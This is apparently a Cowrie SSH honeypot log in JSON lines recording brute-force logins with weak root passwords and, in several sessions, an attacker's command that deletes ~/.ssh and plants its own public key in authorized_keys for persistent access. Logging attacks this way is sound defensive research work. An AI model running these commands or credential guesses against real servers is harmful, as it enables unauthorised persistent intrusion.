{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:34:38.654344Z","src_ip":"196.251.86.249","session":"ec9b2f882c94"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123321","message":"login attempt [oracle/123321] failed","sensor":"my-vps","timestamp":"2025-08-26T10:34:40.793699Z","src_ip":"196.251.86.249","session":"ec9b2f882c94"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:34:42.370301Z","src_ip":"196.251.86.249","session":"ec9b2f882c94"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52798,"dst_ip":"1.2.3.4","dst_port":22,"session":"f384dff64ee7","protocol":"ssh","message":"New connection: 217.72.205.35:52798 (1.2.3.4:22) [session: f384dff64ee7]","sensor":"my-vps","timestamp":"2025-08-26T10:34:50.027104Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:34:50.028262Z","src_ip":"217.72.205.35","session":"f384dff64ee7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41194,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c74f7b97fa3","protocol":"ssh","message":"New connection: 212.227.235.229:41194 (1.2.3.4:22) [session: 8c74f7b97fa3]","sensor":"my-vps","timestamp":"2025-08-26T10:34:59.297305Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:34:59.299534Z","src_ip":"212.227.235.229","session":"8c74f7b97fa3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:34:59.539534Z","src_ip":"212.227.235.229","session":"8c74f7b97fa3"}
{"eventid":"cowrie.login.success","username":"root","password":"India@2022","message":"login attempt [root/India@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:35:00.485958Z","src_ip":"212.227.235.229","session":"8c74f7b97fa3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47028,"dst_ip":"1.2.3.4","dst_port":22,"session":"f785cc6b39d9","protocol":"ssh","message":"New connection: 212.227.235.229:47028 (1.2.3.4:22) [session: f785cc6b39d9]","sensor":"my-vps","timestamp":"2025-08-26T10:35:25.000430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:35:25.001541Z","src_ip":"212.227.235.229","session":"f785cc6b39d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:35:25.231801Z","src_ip":"212.227.235.229","session":"f785cc6b39d9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:35:26.200437Z","src_ip":"212.227.235.229","session":"f785cc6b39d9"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:35:26.434459Z","src_ip":"212.227.235.229","session":"f785cc6b39d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50054,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a455bae05be","protocol":"ssh","message":"New connection: 212.227.235.229:50054 (1.2.3.4:22) [session: 3a455bae05be]","sensor":"my-vps","timestamp":"2025-08-26T10:35:31.206200Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:35:31.207137Z","src_ip":"212.227.235.229","session":"3a455bae05be"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:35:31.420959Z","src_ip":"212.227.235.229","session":"3a455bae05be"}
{"eventid":"cowrie.login.success","username":"root","password":"India@2022","message":"login attempt [root/India@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:35:32.318597Z","src_ip":"212.227.235.229","session":"3a455bae05be"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:35:32.816041Z","src_ip":"212.227.235.229","session":"3a455bae05be"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:35:32.816803Z","src_ip":"212.227.235.229","session":"3a455bae05be"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:35:32.817854Z","src_ip":"212.227.235.229","session":"3a455bae05be"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:35:33.037228Z","src_ip":"212.227.235.229","session":"3a455bae05be"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:35:33.484176Z","src_ip":"212.227.235.229","session":"3a455bae05be"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T10:35:33.484949Z","src_ip":"212.227.235.229","session":"3a455bae05be"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T10:35:33.702719Z","src_ip":"212.227.235.229","session":"3a455bae05be"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:35:33.703632Z","src_ip":"212.227.235.229","session":"3a455bae05be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50060,"dst_ip":"1.2.3.4","dst_port":22,"session":"11dec080141b","protocol":"ssh","message":"New connection: 212.227.235.229:50060 (1.2.3.4:22) [session: 11dec080141b]","sensor":"my-vps","timestamp":"2025-08-26T10:35:33.907702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:35:33.908453Z","src_ip":"212.227.235.229","session":"11dec080141b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:35:34.115295Z","src_ip":"212.227.235.229","session":"11dec080141b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T10:35:34.986186Z","src_ip":"212.227.235.229","session":"11dec080141b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:35:36.195220Z","src_ip":"212.227.235.229","session":"11dec080141b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50062,"dst_ip":"1.2.3.4","dst_port":22,"session":"22344bcc81dd","protocol":"ssh","message":"New connection: 212.227.235.229:50062 (1.2.3.4:22) [session: 22344bcc81dd]","sensor":"my-vps","timestamp":"2025-08-26T10:35:36.408051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:35:36.408824Z","src_ip":"212.227.235.229","session":"22344bcc81dd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:35:36.621525Z","src_ip":"212.227.235.229","session":"22344bcc81dd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:35:37.521344Z","src_ip":"212.227.235.229","session":"22344bcc81dd"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:35:37.735526Z","src_ip":"212.227.235.229","session":"3a455bae05be"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:35:37.736522Z","src_ip":"212.227.235.229","session":"22344bcc81dd"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":41432,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b6467e06ada","protocol":"ssh","message":"New connection: 196.251.86.249:41432 (1.2.3.4:22) [session: 7b6467e06ada]","sensor":"my-vps","timestamp":"2025-08-26T10:35:39.388669Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57182,"dst_ip":"1.2.3.4","dst_port":22,"session":"cee37927d189","protocol":"ssh","message":"New connection: 212.227.235.229:57182 (1.2.3.4:22) [session: cee37927d189]","sensor":"my-vps","timestamp":"2025-08-26T10:35:39.490491Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:35:39.491391Z","src_ip":"212.227.235.229","session":"cee37927d189"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T10:35:39.578932Z","src_ip":"212.227.235.229","session":"cee37927d189"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:35:39.853327Z","src_ip":"196.251.86.249","session":"7b6467e06ada"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:35:39.854145Z","src_ip":"196.251.86.249","session":"7b6467e06ada"}
{"eventid":"cowrie.login.success","username":"root","password":"zxcvbnm1","message":"login attempt [root/zxcvbnm1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:35:39.971724Z","src_ip":"212.227.235.229","session":"cee37927d189"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:35:40.215015Z","src_ip":"212.227.235.229","session":"cee37927d189"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:35:40.215778Z","src_ip":"212.227.235.229","session":"cee37927d189"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T10:35:40.216813Z","src_ip":"212.227.235.229","session":"cee37927d189"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:35:40.305933Z","src_ip":"212.227.235.229","session":"cee37927d189"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:35:40.536369Z","src_ip":"212.227.235.229","session":"cee37927d189"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd 